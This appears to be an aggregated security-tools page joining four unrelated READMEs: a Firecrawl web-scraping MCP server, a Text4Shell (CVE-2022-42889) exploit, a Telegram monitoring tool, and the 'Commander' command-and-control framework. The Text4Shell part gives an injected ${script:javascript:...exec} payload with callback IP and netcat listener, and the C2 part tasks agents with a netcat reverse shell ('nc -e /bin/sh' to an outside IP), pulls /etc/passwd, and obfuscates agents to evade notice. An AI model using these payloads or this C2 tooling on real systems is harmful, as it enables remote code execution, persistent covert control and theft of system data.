
Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.


Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor πŸ–₯️

Note: Requires Cursor version 0.45.6+. For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
    • Name: "firecrawl-mcp" (or your preferred name)
    • Type: "command"
    • Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code:

{
  "mcpServers": {
    "firecrawl-mcp": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR-API-KEY"
      }
    }
  }
}

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY"
      }
    }
  }
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
    • Required when using the cloud API (default)
    • Optional when using a self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
    • Example: https://firecrawl.your-domain.com
    • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration

  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)

Credit Usage Monitoring

  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

        "FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
        "FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
        "FIRECRAWL_RETRY_MAX_DELAY": "30000",
        "FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

        "FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
        "FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
      }
    }
  }
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
  retry: {
    maxAttempts: 3, // Number of retry attempts for rate-limited requests
    initialDelay: 1000, // Initial delay before first retry (in milliseconds)
    maxDelay: 10000, // Maximum delay between retries (in milliseconds)
    backoffFactor: 2, // Multiplier for exponential backoff
  },
  credit: {
    warningThreshold: 1000, // Warn when credit usage reaches this level
    criticalThreshold: 100, // Critical alert when credit usage reaches this level
  },
};

These configurations control:

  1. Retry Behavior
    • Automatically retries failed requests due to rate limits
    • Uses exponential backoff to avoid overwhelming the API
    • Example: With default settings, retries will be attempted at:
      • 1st retry: 1 second delay
      • 2nd retry: 2 seconds delay
      • 3rd retry: 4 seconds delay (capped at maxDelay)
  2. Credit Usage Monitoring
    • Tracks API credit consumption for cloud API usage
    • Provides warnings at specified thresholds
    • Helps prevent unexpected service interruption
    • Example: With default settings:
      • Warning at 1000 credits remaining
      • Critical alert at 100 credits remaining
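
To make the retry schedule concrete: the delay before retry n is initialDelay * backoffFactor^(n-1), capped at maxDelay. A minimal sketch of that arithmetic (illustrative only, not the server's actual implementation):

# Illustrative sketch of the retry schedule described above; the defaults
# mirror the CONFIG block, but this is not the server's actual code.
def retry_delay_ms(attempt, initial_delay=1000, backoff_factor=2, max_delay=10000):
    """Delay in milliseconds before the given retry attempt (1-indexed)."""
    return min(int(initial_delay * backoff_factor ** (attempt - 1)), max_delay)

for attempt in range(1, 4):
    print(f"retry {attempt}: {retry_delay_ms(attempt)} ms")  # 1000, 2000, 4000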

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
  "name": "firecrawl_scrape",
  "arguments": {
    "url": "https://example.com",
    "formats": ["markdown"],
    "onlyMainContent": true,
    "waitFor": 1000,
    "timeout": 30000,
    "mobile": false,
    "includeTags": ["article", "main"],
    "excludeTags": ["nav", "footer"],
    "skipTlsVerification": false
  }
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
  "name": "firecrawl_batch_scrape",
  "arguments": {
    "urls": ["https://example1.com", "https://example2.com"],
    "options": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

Response includes operation ID for status checking:

{
  "content": [
    {
      "type": "text",
      "text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
    }
  ],
  "isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
  "name": "firecrawl_check_batch_status",
  "arguments": {
    "id": "batch_1"
  }
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
  "name": "firecrawl_search",
  "arguments": {
    "query": "your search query",
    "limit": 5,
    "lang": "en",
    "country": "us",
    "scrapeOptions": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
  "name": "firecrawl_crawl",
  "arguments": {
    "url": "https://example.com",
    "maxDepth": 2,
    "limit": 100,
    "allowExternalLinks": false,
    "deduplicateSimilarURLs": true
  }
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
  "name": "firecrawl_extract",
  "arguments": {
    "urls": ["https://example.com/page1", "https://example.com/page2"],
    "prompt": "Extract product information including name, price, and description",
    "systemPrompt": "You are a helpful assistant that extracts product information",
    "schema": {
      "type": "object",
      "properties": {
        "name": { "type": "string" },
        "price": { "type": "number" },
        "description": { "type": "string" }
      },
      "required": ["name", "price"]
    },
    "allowExternalLinks": false,
    "enableWebSearch": false,
    "includeSubdomains": false
  }
}

Example response:

{
  "content": [
    {
      "type": "text",
      "text": {
        "name": "Example Product",
        "price": 99.99,
        "description": "This is an example product description"
      }
    }
  ],
  "isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
  "name": "firecrawl_deep_research",
  "arguments": {
    "query": "how does carbon capture technology work?",
    "maxDepth": 3,
    "timeLimit": 120,
    "maxUrls": 50
  }
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
  "name": "firecrawl_generate_llmstxt",
  "arguments": {
    "url": "https://example.com",
    "maxUrls": 20,
    "showFullText": true
  }
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
  "content": [
    {
      "type": "text",
      "text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
    }
  ],
  "isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against:

  • Apache Commons Text < 1.10.0
  • Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a listener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell payload is sent via the data parameter in a POST request.
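
As a rough illustration of that flow, here is a minimal sketch of the request (the target URL and command are placeholders to adapt per target, as noted above; this is not the PoC's actual code):

# Illustrative sketch of the injection described above; the route and
# command are placeholders, not the PoC's actual values.
import requests

target = "http://127.0.0.1:8080/"  # adapt to the target's vulnerable route
command = "touch /tmp/text4shell-poc"  # benign placeholder command
payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('" + command + "')}"

resp = requests.post(target, data={"data": payload}, timeout=10)
print(resp.status_code, resp.text[:200])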



TEx - Telegram Monitor

By: Zion3R


TEx is a Telegram Explorer tool created to help researchers, investigators, and law enforcement agents collect and process the huge amount of data generated by criminal, fraud, security, and other Telegram groups.


BETA VERSION

Please note that this project has been in beta for a few weeks, so you may encounter bugs that have not yet been mapped out.
Please report bugs at: https://github.com/guibacellar/TEx/issues

Requirements

  • Python 3.8.1+ (deprecated; consider using version 3.10+)
  • Windows x64 or Linux x64

Features

  • Connection Manager
  • Group Information Scraper
  • List Groups
  • Automatic Group Information Sync
  • Automatic Users Information Sync
  • Messages Listener
  • Messages Scraper
  • Download Media
  • HTML Report Generation
  • Export Downloaded Files
  • Export Messages

Installation

Telegram Explorer is available through pip, so just use pip install to fully install TEx.

pip install TelegramExplorer

To upgrade TEx to the latest version, just use the pip install --upgrade command.

pip install --upgrade TelegramExplorer

Documentation: https://telegramexplorer.readthedocs.io/en/latest/



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control (C2) framework written in Python, Flask, and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The Python agent supports:
      • sessions, an interactive shell between the admin and the agent (like SSH)
      • obfuscation
      • both Windows and Linux systems
      • file download/upload functionality
  • C
    • The C agent supports only basic functionality for now: task control for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required, along with the following dependencies.

Linux is required for admin.py and c2_server.py (untested on Windows):
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First, create the required certs and keys:

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local SQLite db file:

python3 admin.py

Continue by running the server:

python3 c2_server.py

And last, the agent. The Python agent can simply be run, but the C agent needs to be compiled first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default, both the agents and the server run over TLS with base64 encoding. The communication endpoint is set to 127.0.0.1:5000; if a different endpoint is needed, change it in the agents' source files.

As the Operator/Administrator, you can use the following commands to control your agents.

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute. e.g. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval at which an agent checks for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start', 'stop', 'status'
port: port is optional for the start arg; if it is not provided, it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists the files in the selected directory on your host
download 'file'
Downloads the 'file' locally into the current directory
upload 'file'
Uploads a file to the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary, but it is not; at least that is what I believe :P

The idea behind this functionality is that the C2 server can ask an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the C2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram.

Normal Flow

In case the environment experiences a major failure, like a corrupted database or some other critical failure, the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, if we lose the database we will have no information about the uuids we are receiving, so we can't set tasks on them. The agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again, so we can insert them into our database and control them again.
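
A rough sketch of that server-side decision (the route and names here are hypothetical, not Commander's actual code):

# Hypothetical sketch of the re-registration decision described above;
# the route and table names are not Commander's actual implementation.
from flask import Flask, jsonify

app = Flask(__name__)
known_agents = set()  # stand-in for the agents table in c2.db

@app.route("/tasks/<uuid>")
def get_tasks(uuid):
    if uuid not in known_agents:
        # Unknown uuid (e.g. after the db was dropped): ask the agent to re-register.
        return jsonify({"task": "c2-register"})
    return jsonify({"task": None})  # no pending tasks in this sketch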

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To set up your environment, start the admin.py first, then the c2_server.py, and run the agent. Afterwards you can check the available agents.

# show all available agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:
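
# run the command id on all agents
task add all c2-shell id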

To check the history/previous results of executed tasks for a specific agent, do it like this:

# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval at which the agents check for tasks to 30 seconds, like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents, do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your preferred agent
task add your_preferred_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, let's select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session, for example with netcat or metasploit, do the following.

# show all available agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that comes back up immediately even if you get disconnected. Only the interactive commands will make it die permanently.

Obfuscation

The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.

Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py.

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py
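
For reference, here is a minimal sketch of that obfuscation scheme (AES-ECB over the agent source, then base64), assuming pycryptodome; the names are illustrative, not obfuscator.py's actual internals:

# Minimal sketch of the AES-ECB + base64 obfuscation described above,
# assuming pycryptodome; illustrative only, not obfuscator.py's internals.
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

key = b"0123456789abcdef"  # the 16-character key mentioned above

def obfuscate(source: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    return base64.b64encode(cipher.encrypt(pad(source, AES.block_size)))

with open("agent.py", "rb") as f:
    print(obfuscate(f.read())[:40])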

Tips & Tricks

  1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance, like this:

gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key

  2. Create a binary file for your Python agent like this:

pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails, you may need to update your python and pip libs. If it continues failing then ..well.. life happened.

  3. Create new certs for each engagement.

  4. Backup your c2.db; it is easy... just a file.

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.

To check the code coverage and produce a nice HTML report, you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


